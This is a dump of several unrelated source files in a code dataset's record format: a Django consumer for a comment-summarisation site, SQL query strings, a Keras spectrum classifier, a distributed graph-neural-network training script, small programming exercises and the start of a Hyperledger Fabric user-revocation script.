else:\n res['top_summary'] = ''\n \n res['top_summary_wiki'] = top_summary\n \n if bottom_summary.strip() != '':\n res['bottom_summary'] = clean_parse(bottom_summary)\n else:\n res['bottom_summary'] = ''\n \n res['bottom_summary_wiki'] = bottom_summary\n return res\n else:\n res['top_summary'] = top_summary\n res['bottom_summary'] = bottom_summary\n return res\n \n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_summarize_selected(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n ids = data['ids']\n children_ids = data['children']\n children_ids = [int(x) for x in children_ids]\n child_id = data['child']\n \n delete_nodes = data['delete_nodes']\n \n summary = data['comment']\n \n top_summary, bottom_summary = get_summary(summary)\n \n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n comments = Comment.objects.filter(id__in=ids)\n children = [c for c in comments if c.id in children_ids]\n child = Comment.objects.get(id=child_id)\n \n lowest_child = children[0]\n for c in children:\n if c.import_order < lowest_child.import_order:\n lowest_child = c\n\n new_id = random_with_N_digits(10)\n \n new_comment = Comment.objects.create(article=a, \n is_replacement=True, \n reply_to_disqus=child.reply_to_disqus,\n summarized=True,\n summary=top_summary,\n extra_summary=bottom_summary,\n disqus_id=new_id,\n points=child.points,\n text_len=len(summary),\n import_order=lowest_child.import_order)\n\n\n for node in delete_nodes:\n delete_node(node)\n\n self.mark_children_summarized(new_comment)\n\n recurse_up_post(new_comment)\n\n recurse_down_num_subtree(new_comment)\n\n a.summary_num = a.summary_num + 1\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='sum_selected',\n to_str=summary,\n explanation='initial summary of group of comments',\n words_shown=words_shown,\n current_percent_complete=percent_complete) \n \n for c in children:\n c.reply_to_disqus = new_id\n c.save()\n h.comments.add(c)\n \n h.comments.add(new_comment)\n a.percent_complete = percent_complete\n 
a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n \n a.save()\n \n res = {'user': username, 'type': data['type'], 'd_id': new_comment.id, 'lowest_d': child_id, 'children': children_ids}\n res['size'] = data['size']\n res['delete_summary_node_dids'] = data['delete_summary_node_dids']\n if 'wikipedia.org' in a.url:\n if top_summary.strip() != '':\n res['top_summary'] = clean_parse(top_summary)\n else:\n res['top_summary'] = ''\n \n res['top_summary_wiki'] = top_summary\n \n if bottom_summary.strip() != '':\n res['bottom_summary'] = clean_parse(bottom_summary)\n else:\n res['bottom_summary'] = ''\n \n res['bottom_summary_wiki'] = bottom_summary\n res['user'] = username\n res['type'] = data['type']\n return res\n else:\n res['top_summary'] = top_summary\n res['bottom_summary'] = bottom_summary\n return res\n \n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_summarize_comments(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n summary = data['comment']\n top_summary, bottom_summary = get_summary(summary)\n\n delete_nodes = data['delete_nodes']\n \n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n c = Comment.objects.get(id=id)\n percent_complete = a.percent_complete\n words_shown = a.words_shown\n\n if not c.is_replacement:\n new_id = random_with_N_digits(10);\n \n new_comment = Comment.objects.create(article=a, \n is_replacement=True, \n reply_to_disqus=c.reply_to_disqus,\n summary=top_summary,\n summarized=True,\n extra_summary=bottom_summary,\n disqus_id=new_id,\n points=c.points,\n text_len=len(summary),\n import_order=c.import_order)\n\n c.reply_to_disqus = new_id\n c.save()\n \n d_id = new_comment.id\n\n self.mark_children_summarized(new_comment)\n\n recurse_up_post(new_comment)\n\n recurse_down_num_subtree(new_comment)\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='sum_nodes',\n to_str=summary,\n explanation='initial summary of subtree',\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n h.comments.add(new_comment)\n \n else:\n from_summary = c.summary + '\\n----------\\n' + c.extra_summary\n c.summary = top_summary\n c.extra_summary=bottom_summary\n c.save()\n \n d_id = c.id\n \n new_comment = c\n recurse_down_num_subtree(new_comment)\n recurse_up_post(c)\n words_shown = count_words_shown(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='edit_sum_nodes',\n from_str=from_summary,\n to_str=summary,\n explanation='edit summary of subtree',\n words_shown=words_shown,\n current_percent_complete=a.percent_complete)\n\n for node in delete_nodes:\n new_h = History.objects.create(user=req_user, \n article=a,\n action='delete_node',\n from_str=node,\n to_str=c.id,\n explanation='promote summary',\n words_shown=a.words_shown,\n current_percent_complete=a.percent_complete)\n delete_node(node)\n\n h.comments.add(c)\n if not c.is_replacement:\n a.summary_num = a.summary_num + 1\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n a.save()\n \n res = {'user': username, 'type': data['type'], 'd_id': new_comment.id, 'node_id': data['node_id'], 'orig_did': data['id']}\n res['subtype'] = data['subtype']\n res['delete_summary_node_dids'] = data['delete_summary_node_dids']\n if 'wikipedia.org' in a.url:\n if top_summary.strip() != '':\n 
res['top_summary'] = clean_parse(top_summary)\n else:\n res['top_summary'] = ''\n\n res['top_summary_wiki'] = top_summary\n\n if bottom_summary.strip() != '':\n res['bottom_summary'] = clean_parse(bottom_summary)\n else:\n res['bottom_summary'] = ''\n\n res['bottom_summary_wiki'] = bottom_summary\n return res\n else:\n res['top_summary'] = top_summary\n res['bottom_summary'] = bottom_summary\n return res\n\n except Exception as e:\n print(e)\n import traceback\n print(traceback.format_exc())\n return {'user': username}\n\n\n def handle_delete_tags(self, data, username):\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n try:\n comment_ids = data['ids']\n comment_ids = comment_ids.split(',')\n ids = []\n for idx in comment_ids:\n if idx:\n ids.append(int(idx))\n\n tag = data['tag']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n\n comments = Comment.objects.filter(id__in=ids)\n\n affected_comments = []\n affected = False\n a = None\n\n for comment in comments:\n a = comment.article\n tag_exists = comment.tags.filter(text=tag)\n\n if tag_exists.count() == 1:\n comment.tags.remove(tag_exists[0])\n affected_comments.append(comment)\n affected = True\n if affected:\n h = History.objects.create(user=req_user,\n article=a,\n action='delete_tag',\n explanation=\"Deleted tag %s from comments\" % tag,\n words_shown=a.words_shown,\n current_percent_complete=a.percent_complete)\n for comment in affected_comments:\n h.comments.add(comment)\n\n a.last_updated = datetime.datetime.now(tz=timezone.utc)\n a.save()\n\n recurse_up_post(comment)\n\n tag_count = a.comment_set.filter(tags__isnull=False).count()\n if tag_count % 2 == 0:\n from .tasks import generate_tags\n generate_tags.delay(a.id)\n\n response_dict = {'type': data['type'], 'dids': data['ids'], 'tag': data['tag'], 'user': username}\n if affected:\n response_dict['affected'] = 1\n else:\n response_dict['affected'] = 0\n return response_dict\n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_hide_comment(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n explain = data['comment']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n\n comment = Comment.objects.get(id=id)\n if comment.is_replacement:\n action = 'delete_sum'\n self.recurse_down_post(comment)\n delete_node(comment.id)\n a.summary_num = a.summary_num - 1\n a.percent_complete = count_article(a)\n a.words_shown = count_words_shown(a)\n a.last_updated = datetime.datetime.now()\n a.save()\n affected = False\n else:\n action = 'hide_comment'\n if not comment.hidden:\n comment.hidden = True\n comment.save()\n affected = True\n else:\n affected = False\n\n if affected:\n parent = Comment.objects.filter(disqus_id=comment.reply_to_disqus, article=a)\n if parent.count() > 0:\n recurse_up_post(parent[0])\n\n a.comment_num = a.comment_num - 1\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user,\n article=a,\n action=action,\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n h.comments.add(comment)\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n\n a.save()\n\n return {'d_id': data['id'], 'user': username, 'type': data['type']}\n except Exception as e:\n print(e)\n return {'user': 
username}\n\n def handle_hide_comments(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n ids = data['ids']\n explain = data['comment']\n \n affected = Comment.objects.filter(id__in=ids, hidden=False).update(hidden=True)\n \n if affected > 0:\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='hide_comments',\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n for id in ids:\n c = Comment.objects.get(id=id)\n h.comments.add(c)\n \n parent = Comment.objects.filter(disqus_id=c.reply_to_disqus, article=a)\n if parent.count() > 0:\n recurse_up_post(parent[0])\n \n a.comment_num = a.comment_num - affected\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n a.save()\n\n return {'dids': data['ids'], 'user': username, 'type': data['type']}\n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_hide_replies(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n explain = data['comment']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n c = Comment.objects.get(id=id)\n\n replies = Comment.objects.filter(reply_to_disqus=c.disqus_id, article=a)\n \n affected = self.recurse_down_hidden(replies, 0)\n \n if affected > 0:\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='hide_replies',\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n replies = Comment.objects.filter(reply_to_disqus=c.disqus_id, article=a)\n for reply in replies:\n h.comments.add(reply)\n \n recurse_up_post(c)\n \n ids = [reply.id for reply in replies]\n \n a.comment_num = a.comment_num - affected\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n \n a.save()\n \n return {'d_id': data['id'], 'user': username, 'type': data['type'], 'ids': ids}\n else:\n return {'user': username}\n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_delete_comment_summary(self, data, username):\n try:\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n comment_id = data['id']\n explain = data['comment']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n\n comment = Comment.objects.get(id=comment_id)\n if not comment.is_replacement:\n comment.summary = \"\"\n comment.save()\n recurse_up_post(comment)\n words_shown = count_words_shown(article)\n percent_complete = count_article(article)\n h = History.objects.create(user=req_user,\n article=article,\n action='delete_comment_sum',\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n\n h.comments.add(comment)\n \n article.percent_complete = percent_complete\n article.words_shown = words_shown\n article.last_updated = datetime.datetime.now()\n article.save()\n \n return {'d_id': data['id'], 'user': username, 'type': data['type']}\n\n except Exception as e:\n print(e)\n return {'user': 
username}\n","sub_path":"wikum/website/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":38719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"598584306","text":"__author__ = 'melaniejiang'\n\nallUsers = \"\"\"\n SELECT idusers, screen_name, name\n FROM users\n \"\"\"\n\nselectUserByIdusers = (\"SELECT * \"\n \"FROM users \"\n \"WHERE idusers = %s\")\n\nselectUserByScreen_name = (\"SELECT * \"\n \"FROM users \"\n \"WHERE screen_name = %s\")\n\nselectTweetsByIdtweets = (\"SELECT idtweets, text \"\n \"FROM tweets \"\n \"WHERE idtweets = %s AND lang = 'en'\")\n\nrangeUsers = (\"SELECT min(idusers), max(idusers) \"\n \"FROM users\")\n\nrangeTweets = (\"SELECT min(idtweets), max(idtweets) \"\n \"FROM tweets\")\n\ninsertUsers = (\"INSERT IGNORE INTO users \"\n \"(idusers,id,screen_name,name,location,description) \"\n \"VALUES (%s,%s,%s,%s,%s,%s)\")\n\ninsertUsers_classified = (\"INSERT IGNORE INTO users_classified \"\n \"(screen_name) \"\n \"VALUES (%s)\")\n\ngetColumnNames = (\"SELECT COLUMN_NAME \"\n \"FROM INFORMATION_SCHEMA.COLUMNS \"\n \"WHERE TABLE_SCHEMA = 'test' AND TABLE_NAME = %s\")\n\nupdateUsers_classified = (\"UPDATE users_classified \"\n \"SET gender = %s \"\n \"WHERE screen_name = %s\")\n\ndescriptionOfGenderedUsers = (\"SELECT id, idusers, description \"\n \"FROM users JOIN users_classified ON (users.screen_name = users_classified.screen_name) \"\n \" AND (users_classified.gender IS NOT NULL)\" )\n\nuser_screen_name_name = (\"SELECT screen_name, name \"\n \"FROM users\")","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"94924923","text":"import pandas as pd\nimport numpy as np\nfrom keras import regularizers\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense,Dropout,Activation,Flatten\nfrom keras.optimizers import SGD\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Conv1D,MaxPooling1D\ndef creat_conv_model():\n model = Sequential()\n model.add(Conv1D(48,11,strides=4,padding='valid',input_shape =(2600,1)))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling1D(pool_size=3,strides=2))\n\n model.add(Conv1D(128,5,strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling1D(pool_size=3,strides=2))\n\n model.add(Conv1D(192,3,strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling1D(pool_size=3,strides=2))\n\n model.add(Flatten())\n model.add(Dense(200,kernel_initializer='glorot_uniform'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(Dense(200,kernel_initializer='glorot_uniform'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(Dense(3,kernel_initializer='glorot_uniform'))\n model.add(BatchNormalization())\n model.add(Activation('softmax'))\n return model\n\ndef read_data_byID(id, filepath):\n with open(filepath +str(id)+'.txt','r') as f:\n for line in f:\n df_star = list(map(float, line.split(',')))\n return df_star\ndef data_pre_process(a):\n #out = np.log10(a - a.min()+1)\n out = ((a - a.min())*100)/(a.max()-a.min())\n #out = medfilt(out)\n return out\ndef read_data(df, filename):\n X_train = np.zeros((df.shape[0],2600),dtype = float)\n for i,id in enumerate(df['id']):\n a = 
np.array(read_data_byID(id,filename))\n X_train[i,:] =data_pre_process(a)\n if i%1000 == 0:\n print(\"reading %d files\"%i)\n print(X_train[i,:])\n print('Finished reading files')\n return X_train\n\nif __name__ == '__main__':\n filename = '../data/first_train_data_20180131/'\n df = pd.read_csv('../data/train.csv')\n qso = df[df['type']=='qso']\n galaxy = df[df['type']=='galaxy']\n star = df[df['type']=='star']\n frames = [star,galaxy,qso]\n cw = {0:1,1:int(star.shape[0]/galaxy.shape[0]),2:int(star.shape[0]/qso.shape[0])}\n train = pd.concat(frames)\n train = train.sample(frac=1).reset_index(drop=True)\n X_train = read_data(train, filename)\n label = np.array(train['type'])\n y_train = np.zeros_like(label, dtype = int)\n y_train = (label == 'galaxy').astype(int) * 1 + (label == 'qso').astype(int) * 2\n #star =0 galaxy = 1 qso =2\n mean_X = X_train.mean(axis = 0,keepdims = True)\n std_X = X_train.std(axis = 0, keepdims = True)\n X_train = (X_train - mean_X)/(std_X)\n Y_train = (np.arange(3)==y_train[:,None]).astype(int)\n #---------------------training-------------------------------\n lr_rate = 1e-3\n reg = 0.02\n best_accu = 0\n best_model = None\n results = {}\n X_train = X_train.reshape((X_train.shape[0],X_train.shape[1],1))\n model = creat_conv_model()\n optimizer = SGD(lr=lr_rate,decay=1e-6,momentum=0.9,nesterov=True)\n model.compile(loss='categorical_crossentropy',optimizer=optimizer,metrics=['accuracy'])\n model.fit(X_train,Y_train,batch_size=256,epochs=10,shuffle=True,verbose=1,validation_split=0.2,class_weight = cw)\n #------------------------------------------------------------\n\n #------------------Saving---------------------\n Version = '0.0.1'\n model.save('3_classfier_unknown_model_ver'+Version+'.h5')\n np.save('mean_X_3_classfier_unknown_model_ver'+Version+'.npy',mean_X)\n np.save('std_X_3_classfier_unknown_model_ver'+Version+'.npy',std_X)\n #---------------------------------------------\n","sub_path":"src/3classfier.py","file_name":"3classfier.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"645757263","text":"# config obj - http://www.gawel.org/docs/ConfigObject/\nfrom ConfigObject import config_module\n\n# singleton flag\n__initialized__ = False\n\n# do init\nif __initialized__ is False:\n # init config obj\n config_module(__name__, __file__, *['config.ini'])\n # update flag\n __initialized__ = True\n","sub_path":"odata/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111066686","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 25 16:11:20 2021\n\n@author: worldofgoo9\n\"\"\"\n# MyPaGraph Test\nimport os\nimport argparse\nimport sys\nimport MyPaGraph as pg\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport dgl.function as fn\nimport dgl\nfrom dgl.data import CoraGraphDataset, CiteseerGraphDataset, PubmedGraphDataset\nfrom dgl.data import RedditDataset\nfrom dgl.data import register_data_args\nimport time\nimport torch.multiprocessing as mp\nimport networkx as nx\n#import matplotlib.pyplot as plt\n#from utils import thread_wrapped_func\nfrom torch.nn.parallel import DistributedDataParallel\nfrom multiprocessing import freeze_support\nimport multiprocessing as mpr\n\n\nclass MyGraphConv(nn.Module):\n def __init__(self, in_feats, out_feats, activation = F.relu):\n 
super(MyGraphConv,self).__init__()\n self.W = nn.Linear(in_feats * 2, out_feats)\n self.activation = activation\n \n def forward(self, block, h):\n # with g.local_scope():\n with block.local_scope():\n # g.ndata['h'] = h\n h_src = h\n h_dst = h[:block.number_of_dst_nodes()]\n block.srcdata['h'] = h_src\n block.dstdata['h'] = h_dst\n\n # g.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_neigh'))\n block.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_neigh'))\n\n # return self.W(torch.cat([g.ndata['h'], g.ndata['h_neigh']], 1))\n return self.activation(self.W(torch.cat(\n [block.dstdata['h'], block.dstdata['h_neigh']], 1)))\n\n\nclass MyGCN(nn.Module):\n #This GCN model is using sampling method\n def __init__(self,\n in_feats,\n n_hidden,\n n_classes,\n n_layers,\n activation=F.relu,\n dropout=0.5,\n g = None\n ):\n super(MyGCN, self).__init__()\n #self.g = g\n assert g is None,\"Remind that sampling method do not need Graph g\"\n \n self.layers = nn.ModuleList()\n # input layer\n if(n_layers==1):\n self.layers.append(MyGraphConv(in_feats, n_classes, activation=activation))\n else:\n self.layers.append(MyGraphConv(in_feats, n_hidden, activation=activation))\n # hidden layers\n for i in range(n_layers - 2):\n self.layers.append(MyGraphConv(n_hidden, n_hidden, activation=activation))\n \n # output layer\n self.layers.append(MyGraphConv(n_hidden, n_classes,activation=activation)) \n #self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, blocks, h):\n assert len(blocks)==len(self.layers),\\\n \"Numbers of blocks and layers should be equal\"\n assert blocks[0].number_of_src_nodes()==len(h),\\\n \"Number of src nodes should be equal to number of features(h)\"\n #h = features\n \n #forward:\n for i, layer in enumerate(self.layers):\n '''\n if i != 0:\n h = self.dropout(h)\n #if use dropout\n ''' \n h = layer(blocks[i], h)\n return h \n \ndef train(procid,args):\n # load and preprocess dataset\n assert procid >= 0\n os.environ['MASTER_ADDR'] = args.MASTER_ADDR \n os.environ['MASTER_PORT'] = args.MASTER_PORT\n \n if args.dataset == 'cora':\n data = CoraGraphDataset()\n elif args.dataset == 'citeseer':\n data = CiteseerGraphDataset()\n elif args.dataset == 'pubmed':\n data = PubmedGraphDataset()\n elif args.dataset == 'reddit':\n data = RedditDataset()\n else:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n\n g = data[0]\n \n \n #data = args.data\n #g = args.data[0]\n #g.create_formats_()\n print(\"New Proc! 
\",procid)\n #return g\n device = torch.device(args.devices_name_list[procid])\n torch.cuda.set_device(device)\n dist_init_method = 'tcp://{master_ip}:{master_port}'.format(\n master_ip=args.MASTER_ADDR, master_port=args.MASTER_PORT)\n world_size = args.ngpus\n torch.distributed.init_process_group(backend=\"nccl\",\n init_method=dist_init_method,\n world_size = world_size,\n rank = procid)\n #torch.cuda.set_device(device)\n#st = pg.Storage(g,[device],[args.PV_list[procid]],[args.TV_list[procid]])\n \n\n # use pagraph \n st = pg.Storage(g=g,data=g.ndata,cache_rate=args.cache_rate,\n nodes=args.PV_list[procid],gpu=args.devices_name_list[procid],cpu='cpu')\n if(True):\n features = g.ndata.pop('feat')\n labels = g.ndata.pop('label')\n train_mask = g.ndata.pop('train_mask')\n val_mask = g.ndata.pop('val_mask')\n test_mask = g.ndata.pop('test_mask')\n in_feats = features.shape[1]\n n_classes = data.num_labels\n n_edges = data.graph.number_of_edges()\n \n print(\"\"\"----Data statistics------'\n #Edges %d\n #Classes %d\n #Train samples %d\n #Val samples %d\n #Test samples %d\"\"\" %\n (n_edges, n_classes,\n train_mask.int().sum().item(),\n val_mask.int().sum().item(),\n test_mask.int().sum().item()))\n \n del features #release memory \n\n # add self loop\n '''\n if args.self_loop:\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n\n '''\n # create GCN model\n model = MyGCN(\n in_feats,\n args.n_hidden,\n n_classes,\n args.n_layers,\n F.relu,\n args.dropout,\n \n )\n model = model.to(device)\n model = DistributedDataParallel(model, device_ids=[device],output_device=device) #device_ids = [device], output_device = device\n \n # set sampler\n fanouts=[]\n for i in range(args.n_layers):\n fanouts.append(args.neighbor_number)\n '''\n example: fanout=[2,2,2,2] or [3,3,3] ...\n '''\n sampler = dgl.dataloading.MultiLayerNeighborSampler(fanouts) \n train_nids = args.TV_list[procid]\n dataloader = dgl.dataloading.NodeDataLoader( \n g, train_nids, sampler,\n batch_size=args.batch_size,\n shuffle=False,\n drop_last=True,\n num_workers=0)\n \n # set loss function\n loss_fcn = torch.nn.CrossEntropyLoss()\n\n # use optimizer\n optimizer = torch.optim.Adam(model.parameters(),\n lr = args.lr)\n\n # initialize graph\n dur = []\n \n \n # Sync\n #if(args.ngpus > 1):\n # torch.distributed.barrier() \n \n #Start trainning\n model.train()\n \n for epoch in range(args.n_epochs):\n # time record\n #if epoch >= 3:\n tS=[0.0,0.0,0.0,0.0,0.0,0.0]\n t0 = time.time()\n \n # forward\n\n #Loss=torch.tensor([0.0],device=device,required_grad=False)\n \n for count,(in_nodes,out_nodes,blocks) in enumerate(dataloader):\n \n t1=time.time()\n blocks=[b.to(device) for b in blocks]\n \n t2=time.time()\n feat_in = st.Query(fname='feat',nodes=in_nodes)\n labels_out = st.Query(fname='label',nodes=out_nodes)\n \n\n t3=time.time()\n # forward\n feat_out = model(blocks,feat_in)\n t4=time.time()\n \n loss = loss_fcn(feat_out,labels_out)\n #Loss=Loss+loss.detach()\n t5=time.time()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n t6=time.time()\n \n tS[1]=tS[1]+t2-t1\n tS[2]=tS[2]+t3-t2\n tS[3]=tS[3]+t4-t3\n tS[4]=tS[4]+t5-t4\n tS[5]=tS[5]+t6-t5\n \n \n\n \n tE=time.time()\n #logits = model(features)\n #loss = loss_fcn(logits[train_mask], labels[train_mask])\n #optimizer.zero_grad()\n #loss.backward()\n #optimizer.step()\n\n #if epoch >= 3:\n dur.append(time.time() - t0)\n\n acc = 0.0 #evaluate(model, features, labels, val_mask)\n if(procid>=0):\n print(\"Epoch {:05d} | Time(s) {:.4f} | Loss {:.4f} | Accuracy {:.4f} | \"\n 
\"ETputs(KTEPS) {:.2f}\". format(epoch, np.mean(dur), loss.item(),\n acc, n_edges / np.mean(dur) / 1000))\n #for i in range(1,6):\n print(tS[1:],'\\nTotal:',tE-t0,\" s \")\n \n \n #Finish trainning\n \n # Sync\n #if(args.ngpus > 1000):\n # torch.distributed.barrier()\n model.eval()\n time.sleep(3)\n\n print(\"____________________________\")\n #acc = evaluate(model, features, labels, test_mask)\n #print(\"Test accuracy {:.2%}\".format(acc))\n \n\n\n\nif __name__ == '__main__':\n \n freeze_support()\n\n parser = argparse.ArgumentParser(description='GCN')\n register_data_args(parser)\n parser.add_argument(\"--data\", type=str, default=\"pubmed\",\n help=\"Dataset\")\n parser.add_argument(\"--dropout\", type=float, default=0.5,\n help=\"dropout probability\")\n parser.add_argument(\"--ngpus\", type=int, default=-1,\n help=\"gpu\")\n parser.add_argument(\"--lr\", type=float, default=1e-2,\n help=\"learning rate\")\n parser.add_argument(\"--n-epochs\", type=int, default=4,\n help=\"number of training epochs\")\n parser.add_argument(\"--n-hidden\", type=int, default=16,\n help=\"number of hidden gcn units\")\n parser.add_argument(\"--n-layers\", type=int, default=1,\n help=\"number of hidden gcn layers\")\n parser.add_argument(\"--hop\", type=int, default=1,\n help=\"number hop\")\n parser.add_argument(\"--weight-decay\", type=float, default=5e-4,\n help=\"Weight for L2 loss\")\n parser.add_argument(\"--self-loop\", action='store_true',\n help=\"graph self-loop (default=False)\")\n parser.add_argument(\"--batch-size\", type=int, default=1024,\n help=\"number of batch size\")\n parser.add_argument(\"--neighbor-number\", type=int, default=5,\n help=\"number of neighbor\")\n parser.add_argument(\"--cache-rate\", type=float, default=0.5,\n help=\"Cache rate\")\n\n args = parser.parse_args()\n args.MASTER_ADDR = '127.0.0.1'\n args.MASTER_PORT = '23456'\n args.dataset=args.data\n args.devices_name_list = ['cuda:0','cuda:1','cuda:2','cuda:3']\n if(args.ngpus > 0):\n args.devices_name_list=[]\n for i in range(args.ngpus):\n args.devices_name_list.append('cuda:'+str(i))\n else:\n args.ngpus=len(args.devices_name_list)\n \n print(\"args: \\n\",args)\n \n os.environ['MASTER_ADDR'] = args.MASTER_ADDR \n os.environ['MASTER_PORT'] = args.MASTER_PORT\n if args.dataset == 'cora':\n data = CoraGraphDataset()\n elif args.dataset == 'citeseer':\n data = CiteseerGraphDataset()\n elif args.dataset == 'pubmed':\n data = PubmedGraphDataset()\n elif args.dataset == 'reddit':\n data = RedditDataset()\n else:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n\n g = data[0]\n\n\n args.TV_list,args.PV_list=pg.Init.DivideGraph(g,args.ngpus,args.n_layers)\n \n #assert 1==0,\"Stop\"\n \n # release memory\n del data\n del g\n\n mp.spawn(train,nprocs = args.ngpus,args = (args,))\n \n print(\"Exit!\")\n \n","sub_path":"TrainMul.py","file_name":"TrainMul.py","file_ext":"py","file_size_in_byte":11716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"262324631","text":"#! 
/usr/bin/python3\n# Uses python3\nimport math\n\n\ndef optimal_summands(n):\n #largest y whose triangular sum stays strictly below n, stepped back by one so the\n #remainder z = n - y*(y+1)/2 is guaranteed to exceed y and keep all summands distinct\n y = int(((-1+math.sqrt(1+8*n))//2)-1)\n #print(y)\n sum1 = int((y*(y+1))/2)\n z = n - sum1\n #e.g. n = 8 -> prints 3, then the summands 1 2 5\n print(y+1)\n for i in range(1,y+1):\n print(i, end=' ')\n print(z)\n #return True\n\nif __name__ == '__main__':\n #input = sys.stdin.read()\n n = int(input())\n optimal_summands(n)\n #print(len(summands))\n #for x in summands:\n # print(x, end=' ')\n","sub_path":"Algo Course 1/week3_greedy_algorithms/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"118619045","text":"\"\"\"\nwrite a function that reads from roster.txt and prints the following information to the command line:\na. how many **FIRST** names contain the letter ‘e’\nb. then lists the FIRST names which contain the letter ‘e’\n\"\"\"\n##go in and print it all in a list, and then separate the ones that are /n and ' '\nimport os\n\ndef read_roster_first_e():\n with open('roster.txt') as roster:\n name_list = roster.read().splitlines()\n first_name_list = [i.split(' ', 1)[0] for i in name_list]\n #keep only the first names that contain an 'e'\n first_name_list_e = [name for name in first_name_list if 'e' in name]\n count = len(first_name_list_e)\n\n print(first_name_list_e)\n print(\"There are \" + str(count) + \" people with e in their name. That's a lot of e's!\")\n\n #exercise 4\n sample_file = open('D06ex03.txt', 'w')\n sample_file.write(str(first_name_list_e))\n sample_file.close()\n\n\ndef main():\n read_roster_first_e()\n\n\nif __name__ == '__main__':\n main()\n ","sub_path":"D06ex03.py","file_name":"D06ex03.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"508149621","text":"import base64\nimport copy\nimport json\nimport os\nimport time\nimport subprocess\n\nimport requests\n\nfrom conf import conf\nfrom subprocess import call, check_output, STDOUT, CalledProcessError, Popen\n\n\ndef revokeFabricUserAndGenerateCRL(org_name, username):\n org = conf['orgs'][org_name]\n org_admin_home = org['admin_home']\n
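\n #the call below shells out to the Fabric CA client; the equivalent CLI (sketch) is:\n # fabric-ca-client revoke -d -c /data/orgs/<org>/admin/fabric-ca-client-config.yaml --revoke.name <user> --gencrl\n print(\n 'Revoking the user \\'%(username)s\\' of the organization \\'%(org_name)s\\' with Fabric CA Client home directory set to %(org_admin_home)s and generating CRL ...' 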
